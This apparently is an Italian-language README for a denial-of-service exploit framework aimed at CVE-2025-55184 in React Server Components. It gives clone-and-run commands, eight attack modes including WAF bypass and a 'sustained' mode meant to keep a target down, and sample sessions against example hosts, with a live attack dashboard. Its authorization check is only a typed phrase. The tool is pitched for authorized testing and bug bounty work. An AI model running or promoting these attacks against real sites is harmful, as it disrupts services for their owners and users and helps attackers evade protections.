Framework di sfruttamento Denial of Service (DoS) di livello professionale per CVE-2025-55184 che prende di mira i React Server Components. Include 8 modalità di attacco, bypass WAF e oltre 10 varianti di payload per test di sicurezza autorizzati e bug bounty hunting.
"IMPARA SEMPRE, HACKERA SEMPRE" - CyberTechAjju
🚀 Avvio Rapido • 📖 Documentazione • 💻 Caratteristiche • ⚠️ Avvertenza Legale
CVE-2025-55184 è una vulnerabilità di Denial of Service (DoS) ad alta gravità che colpisce le implementazioni di React Server Components (RSC). La vulnerabilità consente a un aggressore remoto di causare un'interruzione completa del servizio tramite payload di riferimento circolare appositamente creati.
| Proprietà | Valore |
|---|---|
| CVE ID | CVE-2025-55184 |
| Punteggio CVSS | 7.5 (Alto) |
| Vettore d'Attacco | Rete (Remoto) |
| Complessità | Bassa |
| Privilegi Richiesti | Nessuno (Non autenticato) |
| Impatto | DoS Completo, Esaurimento Risorse |
Non è solo un semplice PoC - è un framework di sfruttamento di livello professionale progettato per seri ricercatori di sicurezza e cacciatori di bug bounty.
git clone https://github.com/CyberTechAjju/CVE-2025-55184-POC-Expolit.git
cd CVE-2025-55184-POC-Expolit
./run.sh
Tutto qui! Le dipendenze si installano automaticamente, il menu interattivo ti guida.
# Python directly
python3 exploit.py
# Advanced CLI mode
python3 cve_2025_55184_exploit.py -t <target> -m scan
| Modalità | Descrizione | Caso d'Uso |
|---|---|---|
| 1. Rilevamento | Impronta digitale passiva | Ricognizione sicura |
| 2. Scansione | Test di vulnerabilità attivi | Conferma |
| 3. Singolo | PoC singolo | Dimostrazione rapida |
| 4. Multi | Multi-thread (5 thread) | Test moderato |
| 5. Aggressivo | Alto impatto (10+ thread) | Penetration test autorizzato |
| 6. WAF | Rilevamento e bypass WAF | Bersagli protetti |
| 7. Report | Genera documentazione | Invio bug bounty |
| 8. Sostenuto | 🔥 NUOVO! DoS continuo | Mantiene il bersaglio giù! |
./run.sh
# Choose: 3 (SUSTAINED ATTACK)
# ✅ Target goes DOWN and STAYS DOWN
# ✅ Press Ctrl+C → Target RECOVERS automatically
Perfetto per:
WAF rilevati automaticamente:
Tecniche di Evasione:
Cerchi lo sfruttamento di CVE-2025-55182? Guarda questo video:
▶️ Guarda su YouTube: Sfruttamento CVE-2025-55182
╔══════════════════════════════════════════════════════════╗
║ ║
║ ______ ________ _____ ___ ___ ║
║ / ____/ / ____/ / / __ \ / _ \ / _ \ ║
║ / / __ / /_ / / \__ \ / / /_\ / /_\ \ ║
║ / /__ / \ /___/ / /___ ___/ /_/\__ /\__ / ║
║ \____/ /_____/______//____/ /_/ /_/ ║
║ ║
║ by CyberTechAjju | "KEEP LEARNING KEEP HACKING" ║
╚══════════════════════════════════════════════════════════╝
⚡ LIVE ATTACK DASHBOARD ⚡
┌─────────────────────────────────────────────────┐
│ Total Requests │ 847 │ ✓ │
│ Successful Attacks │ 521 │ 💥 │
│ Timeouts │ 521 │ ⏱️ │
│ Errors │ 326 │ ❌ │
│ Success Rate │ 61.5% │ 🎯 │
└─────────────────────────────────────────────────┘
./run.sh
Enter target: http://localhost:3000
Choose: 1 (Quick Scan)
Authorization: YES I AM AUTHORIZED
# Results in seconds!
./run.sh
Enter target: http://vulnerable-site.com
Choose: 3 (SUSTAINED ATTACK)
Authorization: YES I AM AUTHORIZED
Type: ATTACK
# Target goes down
# Monitor impact
# Press Ctrl+C when done
# Target recovers automatically!
./run.sh
Enter target: https://protected.cloudflare.com
Choose: 4 (WAF Bypass)
# Auto-detects Cloudflare
# Tries encoding variations
# Shows bypass success/failure
Questo strumento include 10+ varianti di exploit: